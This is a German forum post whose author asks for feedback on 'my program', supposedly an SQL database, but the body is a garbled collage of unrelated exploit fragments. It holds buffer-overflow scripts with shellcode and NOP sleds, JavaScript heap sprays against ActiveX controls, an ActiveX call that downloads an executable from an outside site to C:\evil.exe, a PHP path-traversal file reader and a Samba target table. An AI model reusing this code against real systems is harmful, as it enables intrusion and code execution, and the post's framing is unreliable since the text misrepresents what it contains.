|
#1
04.09.2009, 13:41
| |||
| |||
Bitte eine BeurteilungWollte euch nun mal fragen, wie weit ihr meinen Programm hier beurteilen würdet. Brauche bitte Feedbacks. Danke p.s Sollte eine SQL Datenbank werden. # EAX 010922E0 # ECX 0275FC14 # EDX 88776655 # EBX 00000028 # ESP 0275F688 # EBP 0275F81C # ESI 00F90000 # EDI 00F90378 # EIP 77FC9906 ntdll.77FC9906 $ diff src/ctrigger.cpp src/ctrigger.cpp.new 9a10 > #include <stdio.h> 19a21,33 > void strip( char * str, char c ) > { > char * p1 = str; > while ( *p1++ ) > if( *p1 == c ) > { > char * p2 = p1; > while( *p2 && *p2 == c ) { ++p2; } > if(*p2) { *p1 = *p2; *p2 = c; } > else { *p1 = '\0'; break; } > } > } # Instructions look like: # # 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] # 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX # 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C] # 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX # 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX # 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX $host = $ARGV[0]; $username = $ARGV[1]; $password = $ARGV[2]; $port = 21; $list = "\x4c\x49\x53\x54\x20\x2a"; $padding = "\x41" x 272; $sock = new IO::Socket::INET ( PeerAddr=> "$host", PeerPort=> "$port", Proto => 'tcp' ); die "Connection failed: $!\n\n" unless $sock; $user_string = "user $username\r\n"; $pass_string = "pass $password\r\n"; $port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x10". "\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\ xf8\x6b\x16\x2c". "\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\ x68\x93\x06\x58". "\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\ xfe\xa3\x29\x4a". "\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\ x2b\xc6\xcd\xfb". if ($ARGV[3] == '1') { $payload = $list.$padding.$address2k.$nopsled.$shellcode; } elsif ($ARGV[3] == '2') { $payload = $list.$padding.$address2k.$nopsled.$shellcode; } else { $payload = $list.$padding.$address2k.$nopsled.$shellcode; } print "\n[=] Connected.\n"; sleep 1; print "[=] Sending $user_string"; $sock->send($user_string); sleep 1; id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C if (strlen($ora_osb_bgcookie) > 0 && $button == "Logout") { // Turn DEBUG_EXEC to off $tmp = $DEBUG_EXEC; $DEBUG_EXEC = "no"; if (strncmp($msg[0], "Error:", 6)) { // Set the cookie up. setcookie("ora_osb_bgcookie", ""); setcookie("ora_osb_lcookie", ""); $ora_osb_bgcookie = ""; } $hostname = $_POST['hostname']; $file = $_POST['file']; $port = $_POST['port']; if (isset($_POST['check_ver'])) { echo '<pre>'.check_ver($hostname, 'ver', $port); if (isset($_POST['parampampam'])) { echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>'; html(); } } try{ var obj = document.getElementById('kupa'); var rem = "http://www.adalex.pl/motyl/motyl-radio.exe"; var loc = "C:\evil.exe"; obj.Save("C:\owerwrite.ini"); obj.HttpDownloadFile(rem,loc); } alias unbanallx { mode %chan +b if ($ibl(%chan,0)) { if (%chan ischan) { if ($me isop %chan) || ($me ishop %chan) { ;mode %chan +b var %x $ibl(%chan,0) var %y 0 while (%y <= %x) { var %banlist = $(%banlist,$ibl(%chan,%y)) inc %y } mode %chan $+(-,$str(b,$ibl(%chan,0))) %banlist } else { echo -a ur not op in %chan } } else { echo -a ur not on %chan } } } define VERSN 25 struct versions vers[VERSN] = { {"Debian 3.1 r0 X restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0 X",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0a X 1st",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0a noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r0a noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r1 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r1 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r2 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r2 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r3 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r3 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r4 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r4 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r5 noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r5 noX",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r6a noX restart",0x0827c000,0x0837f000,30*1024}, {"Debian 3.1 r6a noX",0x0827c000,0x0837f000,30*1024}, {"Slackware 10.0 restart",0x0827c000,0x0837f000,30*1024}, {"Slackware 10.0",0x0827c000,0x0837f000,30*1024}, {"Mandrake 10.1 noX",0x80380000,0x8045b000,30*1024}, {"Mandrake 10.1 X Kde",0x80380000,0x8045b000,30*1024}, {"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024} }; unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41% 30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44% 42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30% 41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c% 56%4b%4e") & _ unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42% 56%4b%48") & _ unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b% 58%4e%37") & _ unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a% 51%4b%58") & _ unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46% 53%4b%48") & _ unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46% 38%42%4c") & _ unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44% 4c%4b%4e") & _ unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45% 4e%4b%58") & _ unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e% 30%4b%44") & _ unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e% 32%4b%48") & _ unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41% 53%4b%4d") & _ unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e% 50%4b%58") & _ unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50% 35%4a%56") & _ unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48% 4d%48%46") & _ unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47% 47%43%37") & _ unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b% 4c%4d%4e") & _ unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49% 48%45%4e") & _ unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c% 36%44%50") & _ unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d% 4a%47%55") & _ unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43% 45%43%54") & _ unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a% 56%41%41") & _ unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a% 36%46%4a") & _ unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c% 46%42%41") & _ unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d% 4a%50%32") & _ unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f% 4f%42%4d") & _ unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f% 4f%48%4d") & _ unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43% 39%4a%46") & _ unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48% 4d%45%45") & _ unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a% 46%43%46") & _ unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49% 42%4e%4c") & _ unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41% 33%42%4c") & _ unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44% 44%4e%32") & _ unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b% 4a%4a%46") & _ unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46% 44%4f%4f") & _ unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41% 45%4c%56") & _ unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42% 4d%4a%46") & _ unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48% 4d%4c%36") & _ unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47% 35%4e%4f") & _ unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f% 4f%42%4d") & _ unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f% 4f%48%4d") & _ unescape("%4f%4f%42%4d%5a") "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\ x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\ x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\ x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\ x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\ x4a\x4e\x46\x44". "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\ x4b\x38\x4e\x47". "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\ x4a\x41\x4b\x38". "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\ x46\x33\x4b\x48". "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\ x46\x58\x42\x4c". "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\ x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\ x45\x4e\x4b\x58". "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\ x4e\x50\x4b\x44". my $overflow = "\x42" x 158; my $overflow2 = "\x42" x 4; my $overflow3 = "\x43" x 430; my $overflow4len = 977 - ((length($shellhunter) - 7)); #very important calculation my $overflow4 = "\x44" x $overflow4len my $sled = "\x42" x 12; my $sled2 = "\x41" x 24; my $eip2 = "\x37\x55\x03\x10"; #10035537 call ecx, this won't be used my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used. my $heapaddr = "\x50\x0e\x08\x10"; #valid char for buffer, heap address my $lookout = "\x37\x65\x41\x45" x 40; # 45446537 look out values <- my $lookout2 = "\x37\x65\x41\x45\x41" x 4; # 45446537 <- my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4; # 45446537 <- my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4; # 45446537 <- my $additionaddr = "\x35\x65\x41\x45"; #used for an addition in the shellhunter (+2) my $nopsled = "\x90\x90\x90\x90\x90\x90"; my $jmp = "\x75\x0c"; "%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff% u13cf%u01ac" + ' . "\n" . ' "%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb% u0c8b%u8b4b" + ' . "\n" . ' "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031% u8b64%u3040" + ' . "\n" . var sSlide = unescape("%u9090%u9090"); var heapSA = 0x0c0c0c0c; function tryMe() { var buffSize = 8000; var x = unescape("%0c%0c%0c%0c"); while (x.length<buffSize) x += x; x = x.substring(0,buffSize); boom.SetID(x); } } var heapBS = 0x400000; var sizeHDM = 0x5; var PLSize = (sCode.length * 2); var sSlideSize = heapBS - (PLSize + sizeHDM); var heapBlocks = (heapSA+heapBS)/heapBS; var memory = new Array(); sSlide = getsSlide(sSlide,sSlideSize); for (i=0;i<heapBlocks;i++) { do { spray += spray; } while(spray.length < 0xd0000); memory = new Array(); for(i = 0; i < 100; i++) memory[i] = spray + shellcode; "\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\ x81\x76\x0e\xaf". "\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\ xaf\x4f\x32\xa9". "\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\ x8f\x4e\x52\xa5". "\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\ xa8\x8e\x73\xe1". "\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\ x8b\x4e\x52\x8a". my $p1="\x00\x01"; my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"; my $ret = "\x5d\x10\x40"; #0040105D ->  SkD's Tricksmy $nopsled = "\x90" x 10; my $len = (274 - length($shellcode)); if($len < 0) { print "[x] Your shellcode is too big! Find another way \n";exit(0); } "%u652E%u6578%u9000"); var sSlide = unescape("%u9090%u9090"); var heapSA = 0x0c0c0c0c; function tryMe() { var buffSize = 3000; var x = unescape("%0c%0c%0c%0c"); while (x.length<buffSize) x += x; x = x.substring(0,buffSize); boom.CreateStore(x, 1); } } var heapBS = 0x400000; var sizeHDM = 0x5; var PLSize = (sCode.length * 2); var sSlideSize = heapBS - (PLSize + sizeHDM); var heapBlocks = (heapSA+heapBS)/heapBS; var memory = new Array(); sSlide = getsSlide(sSlide,sSlideSize); for (i=0;i<heapBlocks;i++) { memory[i] = sSlide + sCode; } # grep allow_exec /etc/verlihub/dbconfig allow_exec = 1 or # grep allow_exec $HOME/.verlihub/dbconfig allow_exec = 1 |
 |
| Stichworte |
| - |
|
|
